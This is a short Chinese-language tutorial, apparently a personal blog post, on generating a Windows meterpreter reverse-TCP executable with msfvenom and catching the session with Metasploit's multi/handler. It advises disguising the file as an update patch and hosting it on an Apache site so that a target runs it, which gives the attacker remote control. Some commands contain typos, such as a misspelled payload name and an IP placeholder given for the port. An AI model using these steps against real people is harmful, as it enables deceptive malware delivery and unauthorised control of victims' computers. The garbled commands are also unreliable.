MSFVENOM的使用

#江南的江

#每日鸡汤：泪水和汗水的化学成分相似，但前者只能为你换来同情，后则却可以为你赢得成功。

#初心和目标：争取拿到7ools 的账号。

MSFVENOM

Msfvenom是一个自定义的载荷系统，他是基于msf框架下的附属软件，例如他可以将载荷制成exe文件，然后经过对目标的输出或者社会工程，来对目标进行控制。

实验环境：

攻击机kali

目标windows7(目标不做特殊要求，主要没有安装杀毒和启动病毒防护就行)

先用kali，msfvenom -p windows/meterpreter/revese_tcp

Lhost=XXX.XXX.XXX.XXX     lport=5555  -f exe > （指定一个文件名且后缀为exe的）test.exe

那么如何让目标获得这个文件呢？这要靠你的社会工程学

例如把名字改的好点像是什么更新补丁什么的。

接着我们用apache2来创建一个网站，然后用这个网站达到让目标获得文件的效果

在让目标进行之前先打开msfconsole进行监听

用的是use exploit/multi/handler

Set lhost XXX.XXX.XXX.XXX

Set lport XXX.XXX.XXX.XXX

上面的这些值是你预先在exe文件中设置好的。

然后再设置相应的攻击载荷：

Set payload windows/meterpreter/reverse_tcp

Run

出现这个就表明正在监听，然后让目标打开并使用test.exe文件

成功打入

下面就可以自由的利用吗meterpreter工具箱了